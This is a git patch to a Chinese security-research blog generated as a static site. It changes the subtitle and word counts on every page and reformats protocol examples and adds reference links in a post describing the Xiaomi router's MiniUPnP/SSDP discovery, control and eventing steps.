From d44a0dc66c9042d980ef8d13673348c8da59ee8a Mon Sep 17 00:00:00 2001
From: Cool-Y <1072916769@qq.com>
Date: Sun, 14 Jul 2019 15:58:13 +0800
Subject: [PATCH] Site updated: 2019-07-14 15:57:59

---
 2000/01/01/hello-world/index.html             |  4 +-
 .../BIBA访问控制模型实现(python)/index.html   |  4 +-
 2018/12/15/miio-control/index.html            |  4 +-
 2018/12/23/基于规则引擎发现IOT设备/index.html |  4 +-
 2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html |  4 +-
 .../wifi半双工侧信道攻击学习笔记/index.html   |  4 +-
 2019/02/22/qq数据库的加密解密/index.html      |  4 +-
 2019/03/16/小米固件工具mkxqimage/index.html   |  4 +-
 2019/03/23/auto-send-WX/index.html            |  4 +-
 2019/03/25/Samba-CVE/index.html               |  4 +-
 2019/03/28/逆向工程实验/index.html            |  4 +-
 2019/04/15/Caving-db-storage/index.html       |  4 +-
 2019/04/21/XIAOMI-UPnP/index.html             | 37 ++++++++++---------
 2019/05/13/PE-file/index.html                 |  4 +-
 2019/05/14/pack-and-unpack/index.html         |  4 +-
 2019/07/01/AFL-first-learn/index.html         |  4 +-
 2019/07/09/afl-first-try/index.html           |  4 +-
 2019/07/10/x86basic/index.html                | 35 ++++++++++--------
 about/index.html                              |  4 +-
 archives/2000/01/index.html                   |  4 +-
 archives/2000/index.html                      |  4 +-
 archives/2018/11/index.html                   |  4 +-
 archives/2018/12/index.html                   |  4 +-
 archives/2018/index.html                      |  4 +-
 archives/2019/01/index.html                   |  4 +-
 archives/2019/02/index.html                   |  4 +-
 archives/2019/03/index.html                   |  4 +-
 archives/2019/04/index.html                   |  4 +-
 archives/2019/05/index.html                   |  4 +-
 archives/2019/07/index.html                   |  4 +-
 archives/2019/index.html                      |  4 +-
 archives/2019/page/2/index.html               |  4 +-
 archives/index.html                           |  4 +-
 archives/page/2/index.html                    |  4 +-
 baidusitemap.xml                              |  6 +--
 bookmarks/index.html                          |  4 +-
 categories/IOT/index.html                     |  4 +-
 categories/index.html                         |  4 +-
 categories/二进制/index.html                  |  4 +-
 categories/加密解密/index.html                |  4 +-
 categories/杂七杂八/index.html                |  4 +-
 categories/理论学习/index.html                |  4 +-
 categories/顶会论文/index.html                |  4 +-
 index.html                                    | 13 ++++---
 page/2/index.html                             |  4 +-
 search.xml                                    |  4 +-
 sitemap.xml                                   | 16 ++++----
 tags/AFL/index.html                           |  4 +-
 tags/CVE/index.html                           |  4 +-
 tags/MiniUPnP/index.html                      |  4 +-
 tags/PE/index.html                            |  4 +-
 tags/QQ/index.html                            |  4 +-
 tags/SSH/index.html                           |  4 +-
 tags/Samba/index.html                         |  4 +-
 tags/TCPDUMP/index.html                       |  4 +-
 tags/USENIX/index.html                        |  4 +-
 tags/Windows/index.html                       |  4 +-
 tags/index.html                               |  4 +-
 tags/itchat/index.html                        |  4 +-
 tags/miio/index.html                          |  4 +-
 tags/python/index.html                        |  4 +-
 tags/wifi/index.html                          |  4 +-
 tags/中间人/index.html                        |  4 +-
 tags/二进制/index.html                        |  4 +-
 tags/侧信道攻击/index.html                    |  4 +-
 tags/取证/index.html                          |  4 +-
 tags/复原文件/index.html                      |  4 +-
 tags/密码/index.html                          |  4 +-
 tags/小米/index.html                          |  4 +-
 tags/微信/index.html                          |  4 +-
 tags/拒绝服务攻击/index.html                  |  4 +-
 tags/数据库/index.html                        |  4 +-
 tags/数据挖掘/index.html                      |  4 +-
 tags/文件格式/index.html                      |  4 +-
 tags/模型实现/index.html                      |  4 +-
 tags/模糊测试/index.html                      |  4 +-
 tags/漏洞/index.html                          |  4 +-
 tags/破解/index.html                          |  4 +-
 tags/自然语言处理/index.html                  |  4 +-
 tags/访问控制/index.html                      |  4 +-
 tags/路由器/index.html                        |  4 +-
 tags/远程执行/index.html                      |  4 +-
 tags/逆向/index.html                          |  4 +-
 tags/重放攻击/index.html                      |  4 +-
 84 files changed, 214 insertions(+), 209 deletions(-)

diff --git a/2000/01/01/hello-world/index.html b/2000/01/01/hello-world/index.html
index 17c5e853..eb993b5d 100644
--- a/2000/01/01/hello-world/index.html
+++ b/2000/01/01/hello-world/index.html
@@ -160,7 +160,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -641,7 +641,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2018/11/16/BIBA访问控制模型实现(python)/index.html b/2018/11/16/BIBA访问控制模型实现(python)/index.html
index 6752d9c9..a54790f0 100644
--- a/2018/11/16/BIBA访问控制模型实现(python)/index.html
+++ b/2018/11/16/BIBA访问控制模型实现(python)/index.html
@@ -166,7 +166,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -829,7 +829,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2018/12/15/miio-control/index.html b/2018/12/15/miio-control/index.html
index c986fe14..00c11a5a 100644
--- a/2018/12/15/miio-control/index.html
+++ b/2018/12/15/miio-control/index.html
@@ -170,7 +170,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -731,7 +731,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2018/12/23/基于规则引擎发现IOT设备/index.html b/2018/12/23/基于规则引擎发现IOT设备/index.html
index 7de5193c..4fb2b5f8 100644
--- a/2018/12/23/基于规则引擎发现IOT设备/index.html
+++ b/2018/12/23/基于规则引擎发现IOT设备/index.html
@@ -167,7 +167,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -731,7 +731,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
index c37171aa..48df786f 100644
--- a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
+++ b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
@@ -161,7 +161,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -736,7 +736,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
index 46bdfdf6..15bdd644 100644
--- a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
+++ b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
@@ -174,7 +174,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -859,7 +859,7 @@ Server   -------wire----------|
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/02/22/qq数据库的加密解密/index.html b/2019/02/22/qq数据库的加密解密/index.html
index 95a460f1..9bfe4e08 100644
--- a/2019/02/22/qq数据库的加密解密/index.html
+++ b/2019/02/22/qq数据库的加密解密/index.html
@@ -163,7 +163,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -708,7 +708,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/03/16/小米固件工具mkxqimage/index.html b/2019/03/16/小米固件工具mkxqimage/index.html
index 138e761e..e4fa7ad0 100644
--- a/2019/03/16/小米固件工具mkxqimage/index.html
+++ b/2019/03/16/小米固件工具mkxqimage/index.html
@@ -161,7 +161,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -715,7 +715,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/03/23/auto-send-WX/index.html b/2019/03/23/auto-send-WX/index.html
index b4a95ba1..a6f65f32 100644
--- a/2019/03/23/auto-send-WX/index.html
+++ b/2019/03/23/auto-send-WX/index.html
@@ -161,7 +161,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -725,7 +725,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/03/25/Samba-CVE/index.html b/2019/03/25/Samba-CVE/index.html
index 56946868..1d692e7b 100644
--- a/2019/03/25/Samba-CVE/index.html
+++ b/2019/03/25/Samba-CVE/index.html
@@ -175,7 +175,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -750,7 +750,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/03/28/逆向工程实验/index.html b/2019/03/28/逆向工程实验/index.html
index b07d6d56..7814e7ed 100644
--- a/2019/03/28/逆向工程实验/index.html
+++ b/2019/03/28/逆向工程实验/index.html
@@ -180,7 +180,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -853,7 +853,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/04/15/Caving-db-storage/index.html b/2019/04/15/Caving-db-storage/index.html
index e73afd4d..6f40910a 100644
--- a/2019/04/15/Caving-db-storage/index.html
+++ b/2019/04/15/Caving-db-storage/index.html
@@ -174,7 +174,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -774,7 +774,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/04/21/XIAOMI-UPnP/index.html b/2019/04/21/XIAOMI-UPnP/index.html
index b9e06590..7895a9ad 100644
--- a/2019/04/21/XIAOMI-UPnP/index.html
+++ b/2019/04/21/XIAOMI-UPnP/index.html
@@ -106,7 +106,7 @@
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581672/paper/10.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581840/paper/11.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555918880/paper/2231.png">
-<meta property="og:updated_time" content="2019-05-05T03:00:55.092Z">
+<meta property="og:updated_time" content="2019-07-11T01:51:28.743Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="小米路由器_MiniUPnP协议">
 <meta name="twitter:description" content="概述HomePageOpenWRT与miniUPnP  MiniUPnP项目提供了支持UPnP IGD(互联网网关设备)规范的软件。在MiniUPnPd中添加了NAT-PMP和PCP支持。 对于客户端（MiniUPnPc）使用libnatpmp来支持NAT-PMP。MiniUPnP守护程序（MiniUPnPd）支持OpenBSD，FreeBSD，NetBSD，DragonFly BSD（Open）">
@@ -181,7 +181,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -417,7 +417,7 @@
                 </span>
                 
                 <span title="字数统计">
-                  5.8k 字
+                  6k 字
                 </span>
               
 
@@ -431,7 +431,7 @@
                 </span>
                 
                 <span title="阅读时长">
-                  25 分钟
+                  27 分钟
                 </span>
               
             </div>
@@ -456,6 +456,7 @@
 <blockquote>
 <p>MiniUPnP项目提供了支持UPnP IGD(互联网网关设备)规范的软件。<br>在MiniUPnPd中添加了NAT-PMP和PCP支持。 对于客户端（MiniUPnPc）使用libnatpmp来支持NAT-PMP。<br>MiniUPnP守护程序（MiniUPnPd）支持OpenBSD，FreeBSD，NetBSD，DragonFly BSD（Open）Solaris和Mac OS X以及pf或ipfw（ipfirewall）或ipf和Linux with netfilter。 MiniUPnP客户端（MiniUPnPc）和MiniSSDPd是便携式的，可以在任何POSIX系统上运行。 MiniUPnPc也适用于MS Windows和AmigaOS（版本3和4）。</p>
 </blockquote>
+<p><a href="https://2014.ruxcon.org.au/assets/2014/slides/rux-soap_upnp_ruxcon2014.pptx" target="_blank" rel="noopener">https://2014.ruxcon.org.au/assets/2014/slides/rux-soap_upnp_ruxcon2014.pptx</a><br><a href="https://www.akamai.com/us/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf" target="_blank" rel="noopener">https://www.akamai.com/us/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf</a><br><a href="https://www.defcon.org/images/defcon-19/dc-19-presentations/Garcia/DEFCON-19-Garcia-UPnP-Mapping.pdf" target="_blank" rel="noopener">https://www.defcon.org/images/defcon-19/dc-19-presentations/Garcia/DEFCON-19-Garcia-UPnP-Mapping.pdf</a></p>
 <h2 id="UPnP-IGD客户端轻量级库和UPnP-IGD守护进程"><a href="#UPnP-IGD客户端轻量级库和UPnP-IGD守护进程" class="headerlink" title="UPnP IGD客户端轻量级库和UPnP IGD守护进程"></a>UPnP IGD客户端轻量级库和UPnP IGD守护进程</h2><p>大多数家庭adsl /有线路由器和Microsoft Windows 2K/XP都支持UPnP协议。 MiniUPnP项目的目标是提供一个免费的软件解决方案来支持协议的“Internet网关设备”部分。</p>
 <blockquote>
 <p>用于UPnP设备的Linux SDK（libupnp）对我来说似乎太沉重了。 我想要最简单的库，占用空间最小，并且不依赖于其他库，例如XML解析器或HTTP实现。 所有代码都是纯ANSI C.</p>
@@ -475,13 +476,13 @@
 <h2 id="安全"><a href="#安全" class="headerlink" title="安全"></a>安全</h2><p>UPnP实施可能会受到安全漏洞的影响。 错误执行或配置的UPnP IGD易受攻击。 安全研究员HD Moore做了很好的工作来揭示现有实施中的漏洞：<a href="http://hdm.io/writing/originals/SecurityFlawsUPnP.pdf" target="_blank" rel="noopener">通用即插即用（PDF）中的安全漏洞</a>。 一个常见的问题是让SSDP或HTTP/SOAP端口对互联网开放：它们应该只能从LAN访问。</p>
 <h1 id="协议栈"><a href="#协议栈" class="headerlink" title="协议栈"></a>协议栈</h1><p>工作流程<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830377/paper/111.png" alt></p>
 <p>Linux体系结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830425/paper/112.png" alt></p>
-<h2 id="发现"><a href="#发现" class="headerlink" title="发现"></a>发现</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830465/paper/113.png" alt><br>给定一个IP地址（通过DHCP获得），UPnP网络中的第一步是发现。<br>当一个设备被加入到网络中并想知道网络上可用的UPnP服务时，UPnP检测协议允许该设备向控制点广播自己的服务。通过UDP协议向端口1900上的多播地址239.255.255.250发送发现消息。此消息包含标头，类似于HTTP请求。此协议有时称为HTTPU（HTTP over UDP）：<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">M-SEARCH * HTTP / <span class="number">1.1</span></span><br><span class="line">主机：<span class="number">239.255</span><span class="number">.255</span><span class="number">.250</span> ：<span class="number">1900</span></span><br><span class="line">MAN：ssdp：discover</span><br><span class="line">MX：<span class="number">10</span></span><br><span class="line">ST：ssdp：all</span><br></pre></td></tr></table></figure></p>
-<p>所有其他UPnP设备或程序都需要通过使用UDP单播将类似的消息发送回设备来响应此消息，并宣布设备或程序实现哪些UPnP配置文件。对于每个配置文件，它实现一条消息发送：<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">HTTP / <span class="number">1.1</span> <span class="number">200</span> OK</span><br><span class="line">CACHE-CONTROL：max-age = <span class="number">1800</span></span><br><span class="line">EXT：</span><br><span class="line">LOCATION：http：//<span class="number">10.0</span><span class="meta">.0</span><span class="meta">.138</span>：<span class="number">80</span> / IGD.xml</span><br><span class="line">SERVER：SpeedTouch <span class="number">510</span> <span class="number">4.0</span><span class="meta">.0</span><span class="meta">.9</span><span class="meta">.0</span> UPnP / <span class="number">1.0</span>（DG233B00011961）</span><br><span class="line"><span class="built_in">ST</span>：urn：schemas-upnp-org：service：WANPPPConnection：<span class="number">1</span></span><br><span class="line">USN：uuid：UPnP-SpeedTouch510 :: urn：schemas-upnp-org：service：WANPPPConnection：<span class="number">1</span></span><br></pre></td></tr></table></figure></p>
+<h2 id="发现"><a href="#发现" class="headerlink" title="发现"></a>发现</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830465/paper/113.png" alt><br>给定一个IP地址（通过DHCP获得），UPnP网络中的第一步是发现。<br>当一个设备被加入到网络中并想知道网络上可用的UPnP服务时，UPnP检测协议允许该设备向控制点广播自己的服务。通过UDP协议向端口1900上的多播地址239.255.255.250发送发现消息。此消息包含标头，类似于HTTP请求。此协议有时称为HTTPU（HTTP over UDP）：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">M-SEARCH * HTTP / 1.1</span><br><span class="line">主机：239.255.255.250 ：1900</span><br><span class="line">MAN：ssdp：discover</span><br><span class="line">MX：10</span><br><span class="line">ST：ssdp：all</span><br></pre></td></tr></table></figure></p>
+<p>所有其他UPnP设备或程序都需要通过使用UDP单播将类似的消息发送回设备来响应此消息，并宣布设备或程序实现哪些UPnP配置文件。对于每个配置文件，它实现一条消息发送：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">HTTP / 1.1 200 OK</span><br><span class="line">CACHE-CONTROL：max-age = 1800</span><br><span class="line">EXT：</span><br><span class="line">LOCATION：http：//10.0.0.138：80 / IGD.xml</span><br><span class="line">SERVER：SpeedTouch 510 4.0.0.9.0 UPnP / 1.0（DG233B00011961）</span><br><span class="line">ST：urn：schemas-upnp-org：service：WANPPPConnection：1</span><br><span class="line">USN：uuid：UPnP-SpeedTouch510 :: urn：schemas-upnp-org：service：WANPPPConnection：1</span><br></pre></td></tr></table></figure></p>
 <p>类似地，当一个控制点加入到网络中的时候，它也能够搜索到网络中存在的、感兴趣的设备相关信息。这两种类型的基础交互是一种仅包含少量、重要相关设备信息或者它的某个服务。比如，类型、标识和指向更详细信息的链接。<br>UPnP检测协议是 <strong><em>基于简单服务发现协议（SSDP）</em></strong> 的。</p>
 <h2 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h2><p>UPnP网络的下一步是描述。当一个控制点检测到一个设备时，它对该设备仍然知之甚少。为了使控制点了解更多关于该设备的信息或者和设备进行交互，控制点必须从设备发出的检测信息中包含的URL获取更多的信息。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830499/paper/114.png" alt><br>某个设备的UPnP描述是 <strong>XML</strong> 的方式,通过http协议，包括品牌、厂商相关信息，如型号名和编号、序列号、厂商名、品牌相关URL等。描述还包括一个嵌入式设备和服务列表，以及控制、事件传递和存在相关的URL。对于每种设备，描述还包括一个命令或动作列表，包括响应何种服务，针对各种动作的参数；这些变量描述出运行时设备的状态信息，并通过它们的数据类型、范围和事件来进行描述。</p>
-<h2 id="控制"><a href="#控制" class="headerlink" title="控制"></a>控制</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830533/paper/1133.png" alt><br>UPnP网络的下一步是控制。当一个控制点获取到设备描述信息之后，它就可以向该设备发送指令了。为了实现此，控制点发送一个合适的控制消息至服务相关控制URL（包含在设备描述中）。<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">service</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">serviceType</span>&gt;</span> urn：schemas-upnp-org：service：WANPPPConnection：1 <span class="tag">&lt;/ <span class="attr">serviceType</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">serviceId</span>&gt;</span> urn：upnp-org： serviceId：wanpppc：pppoa <span class="tag">&lt;/ <span class="attr">serviceId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">controlURL</span>&gt;</span> / upnp / control / wanpppcpppoa <span class="tag">&lt;/ <span class="attr">controlURL</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">eventSubURL</span>&gt;</span> / upnp / event / wanpppcpppoa <span class="tag">&lt;/ <span class="attr">eventSubURL</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">SCPDURL</span>&gt;</span> /WANPPPConnection.xml <span class="tag">&lt;/ <span class="attr">SCPDURL</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/ <span class="attr">service</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
+<h2 id="控制"><a href="#控制" class="headerlink" title="控制"></a>控制</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830533/paper/1133.png" alt><br>UPnP网络的下一步是控制。当一个控制点获取到设备描述信息之后，它就可以向该设备发送指令了。为了实现此，控制点发送一个合适的控制消息至服务相关控制URL（包含在设备描述中）。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;service&gt;</span><br><span class="line">  &lt;serviceType&gt; urn：schemas-upnp-org：service：WANPPPConnection：1 &lt;/ serviceType&gt;</span><br><span class="line">  &lt;serviceId&gt; urn：upnp-org： serviceId：wanpppc：pppoa &lt;/ serviceId&gt;</span><br><span class="line">  &lt;controlURL&gt; / upnp / control / wanpppcpppoa &lt;/ controlURL&gt;</span><br><span class="line">  &lt;eventSubURL&gt; / upnp / event / wanpppcpppoa &lt;/ eventSubURL&gt;</span><br><span class="line">  &lt;SCPDURL&gt; /WANPPPConnection.xml &lt;/ SCPDURL&gt;</span><br><span class="line">&lt;/ service&gt;</span><br></pre></td></tr></table></figure></p>
 <p>要发送SOAP请求，只需要controlURL标记内的URL。控制消息也是通过 <strong><em>简单对象访问协议（SOAP）</em></strong> 用XML来描述的。类似函数调用，服务通过返回动作相关的值来回应控制消息。动作的效果，如果有的话，会反应在用于刻画运行中服务的相关变量。</p>
-<h2 id="事件通知"><a href="#事件通知" class="headerlink" title="事件通知"></a>事件通知</h2><p>下一步是事件通知。UPnP中的事件 <strong><em>协议基于GENA</em></strong> 。一个UPnP描述包括一组命令列表和刻画运行时状态信息的变量。服务在这些变量改变的时候进行更新，控制点可以进行订阅以获取相关改变。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830573/paper/115.png" alt><br>服务通过发送事件消息来发布更新。事件消息包括一个或多个状态信息变量以及它们的当前数值。这些消息也是采用XML的格式，用通用事件通知体系进行格式化。一个特殊的初始化消息会在控制点第一次订阅的时候发送，它包括服务相关的变量名及值。为了支持多个控制点并存的情形，事件通知被设计成对于所有的控制点都平行通知。因此，所有的订阅者同等地收到所有事件通知。<br>当状态变量更改时，新状态将发送到已订阅该事件的所有程序/设备。程序/设备可以通过eventSubURL来订阅服务的状态变量，该URL可以在LOCATION指向的URL中找到。<br><figure class="highlight bnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">&lt;service&gt;</span></span><br><span class="line">  <span class="attribute">&lt;serviceType&gt;</span> urn：schemas-upnp-org：service：WANPPPConnection：1 <span class="attribute">&lt;/ serviceType&gt;</span></span><br><span class="line">  <span class="attribute">&lt;serviceId&gt;</span> urn：upnp-org：serviceId：wanpppc：pppoa <span class="attribute">&lt;/ serviceId&gt;</span></span><br><span class="line">  <span class="attribute">&lt;controlURL&gt;</span> / upnp / control / wanpppcpppoa <span class="attribute">&lt;/ controlURL&gt;</span></span><br><span class="line">  <span class="attribute">&lt;eventSubURL&gt;</span> / upnp / event / wanpppcpppoa <span class="attribute">&lt;</span></span><br><span class="line"><span class="attribute">  &lt;SCPDURL&gt;</span> /WANPPPConnection.xml <span class="attribute">&lt;/ SCPDURL&gt;</span></span><br><span class="line"><span class="attribute">&lt;/ service&gt;</span></span><br></pre></td></tr></table></figure></p>
+<h2 id="事件通知"><a href="#事件通知" class="headerlink" title="事件通知"></a>事件通知</h2><p>下一步是事件通知。UPnP中的事件 <strong><em>协议基于GENA</em></strong> 。一个UPnP描述包括一组命令列表和刻画运行时状态信息的变量。服务在这些变量改变的时候进行更新，控制点可以进行订阅以获取相关改变。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830573/paper/115.png" alt><br>服务通过发送事件消息来发布更新。事件消息包括一个或多个状态信息变量以及它们的当前数值。这些消息也是采用XML的格式，用通用事件通知体系进行格式化。一个特殊的初始化消息会在控制点第一次订阅的时候发送，它包括服务相关的变量名及值。为了支持多个控制点并存的情形，事件通知被设计成对于所有的控制点都平行通知。因此，所有的订阅者同等地收到所有事件通知。<br>当状态变量更改时，新状态将发送到已订阅该事件的所有程序/设备。程序/设备可以通过eventSubURL来订阅服务的状态变量，该URL可以在LOCATION指向的URL中找到。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;service&gt;</span><br><span class="line">  &lt;serviceType&gt; urn：schemas-upnp-org：service：WANPPPConnection：1 &lt;/ serviceType&gt;</span><br><span class="line">  &lt;serviceId&gt; urn：upnp-org：serviceId：wanpppc：pppoa &lt;/ serviceId&gt;</span><br><span class="line">  &lt;controlURL&gt; / upnp / control / wanpppcpppoa &lt;/ controlURL&gt;</span><br><span class="line">  &lt;eventSubURL&gt; / upnp / event / wanpppcpppoa &lt;</span><br><span class="line">  &lt;SCPDURL&gt; /WANPPPConnection.xml &lt;/ SCPDURL&gt;</span><br><span class="line">&lt;/ service&gt;</span><br></pre></td></tr></table></figure></p>
 <h2 id="展示"><a href="#展示" class="headerlink" title="展示"></a>展示</h2><p>最后一步是展示。如果设备带有存在URL，那么控制点可以通过它来获取设备存在信息，即在浏览器中加载URL，并允许用户来进行相关控制或查看操作。具体支持哪些操作则是由存在页面和设备完成的。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830618/paper/1111.png" alt></p>
 <h2 id="NAT穿透"><a href="#NAT穿透" class="headerlink" title="NAT穿透"></a>NAT穿透</h2><p>UPnP为NAT（网络地址转换）穿透带来了一个解决方案：<strong>互联网网关设备协议（IGD）</strong>。NAT穿透允许UPnP数据包在没有用户交互的情况下，无障碍的通过路由器或者防火墙（假如那个路由器或者防火墙支持NAT）。</p>
 <h1 id="SOAP和UPnP"><a href="#SOAP和UPnP" class="headerlink" title="SOAP和UPnP"></a>SOAP和UPnP</h1><table>
@@ -585,25 +586,25 @@
 <li>随时掌握固件更新<br>并非总是自动的</li>
 <li>模糊测试<br>Burp – <a href="http://portswigger.net/burp/" target="_blank" rel="noopener">http://portswigger.net/burp/</a><br>WSFuzzer – <a href="https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project" target="_blank" rel="noopener">https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project</a><br>Miranda – <a href="http://code.google.com/p/miranda-upnp/" target="_blank" rel="noopener">http://code.google.com/p/miranda-upnp/</a></li>
 </ul>
